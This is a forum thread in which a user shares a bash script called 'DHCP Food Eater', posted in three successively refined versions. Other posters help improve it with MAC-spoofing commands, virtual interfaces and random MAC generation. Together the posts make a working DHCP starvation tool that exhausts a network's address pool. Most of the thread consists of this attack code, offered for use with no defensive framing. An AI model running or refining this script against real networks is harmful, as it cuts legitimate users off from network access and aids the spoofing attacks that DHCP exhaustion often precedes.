10 replies to this topic

[TheFunk]

I wrote a simple DHCP starvation script the other day. It's a bash script per my usual. It requires you to have dhcpcd and macchanger installed. However, A problem occurs when I bring the target interface down. Instead of holding the lease for however long, I'm finding that most DHCP servers will instantly readd the IP address that my computer acquired back to the pool and then reissue it when I make a request from a new (spoofed) MAC address. Anyone have any ideas for how I can resolve this issue? Perhaps there's a means of creating subinterfaces in Linux, that way I don't have to break connection? Anyway, here you are, enjoy! If anyone is interested in the script, I plan on changing it so that it takes parameters, for example ./foodeater --nmask 24, or something along those lines in the near future.

#!/bin/bash

#
# DHCP Food Eater
# by TheFunk
#

# Kills Backtrack's Default DHCP Daemon
kill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`
clear
echo ""
echo "How many addresses should we try to exhaust?"
read range
clear
echo ""
echo "What interface are we using?"
read daint

for ((current=1; current<range; current++));
do
kill `ps ax | egrep "dhcpcd" | head -1 | cut -d' ' -f2`
ifconfig $daint down
macchanger -A $daint
sleep 2
ifconfig $daint up
dhcpcd $daint
sleep 5
echo "I have" $current "addresses"
done

 

[TheFunk]

Revised Version. Now with more ease of use.

 

#!/bin/bash

#
# DHCP Food Eater
# by TheFunk
#

# Usage: ./foodeater number-of-requests-to-make interface-to-use
# Usage Example: ./foodeater 255 wlan0

# In the above example the script will request 255 unique IP addresses from the DHCP server.
# If the network is a typical Class C with a /24 network mask, then 254 should be the
# maximum number of IP addresses available, and the 255th request should throw an error.
# In the example case, the network is wireless, as indicated by the name wlan0.


# Kills Backtrack's Default DHCP Daemon
kill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`
clear
range=$1
daint=$2
cat <<"EOF"

Ready?

            (\____/)
            / @__@ \    
           (  (oo)  )   
            `-.~~.-'
             /    \             
           @/      \_          
          (/ /    \ \)
      jgs  WW`----'WW

	Press Enter
EOF
read hold
for ((current=1; current<range; current++));
do
kill `ps ax | egrep "dhcpcd" | head -1 | cut -d' ' -f2`
ifconfig $daint down
macchanger -A $daint
sleep 2
ifconfig $daint up
dhcpcd $daint
sleep 3
echo "I have" $current "addresses"
done

[systems_glitch]

Heh, nice work! DHCP is often overlooked as a source of trouble from outsiders on networks. One situation that comes to mind is captive portal Internet gateways.

[TheFunk]

Thanks! Also, I read your post on NELF. If I lived anywhere farther North I would have definitely been there. A festival dedicated to Linux? Yes please.

[shin_chan]

hello (just registered)

 

 

you can also just use ifconfig, like this

 

ifconfig eth0 down
ifconfig eth0 hw ether 00:11:22:33:44:55
ifconfig eth0 up

 

no need to install additional software

[TheFunk]

That's true, and glad to have been your first post

The thing that really appealed to me about using macchanger though was the pseudo-random generator. It would be a pain in the butt to generate a random mac address with bash. I could have also just stuck with dhclient instead of using dhcpcd, but that's a matter of personal preference.

Lastly, I realize an error in the script, the for statement at the end should read "for ((current=1; current<=range; current++));" instead of "for ((current=1; current<range; current++));"

[systems_glitch]

For generating a random(ish) MAC address, can you sample /dev/(u)random and convert what you get to hex?

[shin_chan]

And if you don't want to bring the if down you can use virtual interfaces

 

ip link add type veth (will generate a random mac and increment the name. veth0, veth1...)

ifconfig veth0 up

ifconfig veth0 inet dhcp

 

maybe like this you can get multiple interfaces leased at the same time

[TheFunk]

That's perfect! That's exactly what I was trying to figure out how to do! Virtual/Sub interfaces. Come to think of it, I probably should have just Googled that. Thanks!

And I'll see about /dev/urandom. The key will be only pulling hex characters, but that shouldn't be too hard. Fellas you've given me a lot to work with.

[systems_glitch]

Getting a MAC address from /dev/urandom:

 

dd if=/dev/urandom bs=6 count=1 | hexdump -e '1/1 "%.2x:"' | sed 's/:$/\n/'

 

Remember, every byte can be expressed as hex

 

EDIT: Removed `status=none`, apparently it doesn't work on BSD `dd`

 

EDIT AGAIN: Derp, 6 bytes, 12 hex /digits/

[TheFunk]

Arlrighty, I'm definitely getting closer. The only problem left now is finding a way to give each subinterface it's own unique spoofed MAC instead of just the parent interface. For some reason the aliased interfaces refuse to take individual MAC addresses. I tried the veth method, but that allowed for a maximum of 2 "virtual interfaces" when I tried, so this was the next best thing I could think of. I'm going to look into ip addr and see if that might help some. Now...back to the Batcave!
 

#!/bin/bash

#
# DHCP Food Eater
# by TheFunk
#

# Usage: ./foodeater number-of-requests-to-make interface-to-use
# Usage Example: ./foodeater 255 wlan0

# In the above example the script will request 255 unique IP addresses from the DHCP server.
# If the network is a typical Class C with a /24 network mask, then 254 should be the
# maximum number of IP addresses available, and the 255th request should throw an error.
# In the example case, the network is wireless, as indicated by the name wlan0.


# Kills Backtrack's Default DHCP Daemon
kill `ps ax | egrep "dhclient" | head -1 | cut -d' ' -f2`
clear
range=$1
daint=$2
cat <<"EOF"

Ready?

            (\____/)
            / @__@ \    
           (  (oo)  )   
            `-.~~.-'
             /    \             
           @/      \_          
          (/ /    \ \)
      jgs  WW`----'WW

	Press Enter
EOF
read hold

# Spoofs MAC address.
ifconfig $daint down
macaddr=`dd if=/dev/urandom bs=6 count=1 | hexdump -e '1/1 "%.2x:"' | sed 's/:$/\n/'`
ifconfig $daint hw ether $macaddr

# Loops until all addresses are exhausted...and then some.
for ((current=1; current<=range; current++));
do
ifconfig $daint":"$current
dhcpcd $daint
echo "I have" $current "addresses"
done